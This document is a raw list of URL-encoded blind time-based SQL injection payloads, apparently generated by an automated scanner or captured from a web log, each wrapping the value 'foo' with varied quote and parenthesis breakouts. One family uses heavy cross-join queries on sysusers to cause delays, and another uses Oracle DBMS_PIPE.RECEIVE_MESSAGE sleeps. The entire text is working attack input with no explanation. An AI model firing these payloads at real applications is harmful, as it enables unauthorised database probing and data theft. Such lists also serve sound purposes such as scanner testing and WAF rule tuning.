foo%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%29%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%29%29%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%29%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%29%29%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%29%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%29%29%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%22%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%22%29%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%22%29%29%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%22%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%22%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%22%29%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%22%29%29%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%22%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%25%27%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%25%27%29%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%25%27%29%29%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%25%27%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%00%27%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%00%27%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%29%20WHERE%203501%3D3501%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%22%29%20WHERE%205125%3D5125%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%29%20WHERE%206230%3D6230%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%20WHERE%207142%3D7142%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%22%20WHERE%203166%3D3166%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%20WHERE%208977%3D8977%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%7C%7C%28SELECT%20%27gcou%27%20FROM%20DUAL%20WHERE%209115%3D9115%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%7C%7C%28SELECT%20%27tkgU%27%20WHERE%203960%3D3960%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%2B%28SELECT%20iRWr%20WHERE%207938%3D7938%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%2B%28SELECT%20%27LZKg%27%20WHERE%204303%3D4303%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%20IN%20BOOLEAN%20MODE%29%20AND%204375%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29 foo%27%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29 foo%27%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29 foo%22%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29 foo%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%287464%3D7464 foo%29%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%282148%3D2148 foo%29%29%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%28%285300%3D5300 foo%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29 foo%27%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%27YgbA%27%3D%27YgbA foo%27%29%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%28%27xpIH%27%3D%27xpIH foo%27%29%29%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%28%28%27KeII%27%3D%27KeII foo%27%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%27erJl%27%3D%27erJl foo%27%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%27xBwb%27%20LIKE%20%27xBwb foo%27%29%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%28%27fFzi%27%20LIKE%20%27fFzi foo%27%29%29%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%28%28%27dWlG%27%20LIKE%20%27dWlG foo%27%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%27xGEK%27%20LIKE%20%27xGEK foo%22%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%22iZre%22%3D%22iZre foo%22%29%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%28%22Aiej%22%3D%22Aiej foo%22%29%29%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%28%28%22egoH%22%3D%22egoH foo%22%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%22qGcW%22%3D%22qGcW foo%22%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%22SvJl%22%20LIKE%20%22SvJl foo%22%29%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%28%22LIhM%22%20LIKE%20%22LIhM foo%22%29%29%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%28%28%22ArVE%22%20LIKE%20%22ArVE foo%22%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%22hxpg%22%20LIKE%20%22hxpg foo%25%27%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%28%27yeSW%27%3D%27yeSW foo%00%27%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20AND%20%27lDaK%27%3D%27lDaK foo%27%29%20WHERE%206677%3D6677%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20--%20 foo%22%29%20WHERE%209205%3D9205%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20--%20 foo%29%20WHERE%205075%3D5075%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20--%20 foo%27%20WHERE%205102%3D5102%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20--%20 foo%22%20WHERE%209174%3D9174%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20--%20 foo%20WHERE%204816%3D4816%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20--%20 foo%27%7C%7C%28SELECT%20%27XJWT%27%20FROM%20DUAL%20WHERE%202225%3D2225%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27QEjK%27%20WHERE%204073%3D4073%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20HsNR%20WHERE%204345%3D4345%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20%29%2B%27 foo%27%2B%28SELECT%20%27HCJo%27%20WHERE%205674%3D5674%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%201140%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2885%29%7C%7CCHR%28100%29%7C%7CCHR%2869%29%2C5%29%20%23 foo%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%22%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%29%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%29%29%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%29%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%29%29%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%29%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%29%29%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%22%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%22%29%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%22%29%29%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%22%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%22%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%22%29%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%22%29%29%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%22%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%25%27%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%25%27%29%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%25%27%29%29%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%25%27%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%00%27%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%00%27%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%29%20WHERE%209435%3D9435%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%22%29%20WHERE%202086%3D2086%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%29%20WHERE%207676%3D7676%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%20WHERE%203104%3D3104%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%22%20WHERE%209176%3D9176%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%20WHERE%202847%3D2847%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%7C%7C%28SELECT%20%27uKWR%27%20FROM%20DUAL%20WHERE%201663%3D1663%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%7C%7C%28SELECT%20%27jdSE%27%20WHERE%207397%3D7397%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%2B%28SELECT%20iIny%20WHERE%203529%3D3529%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- 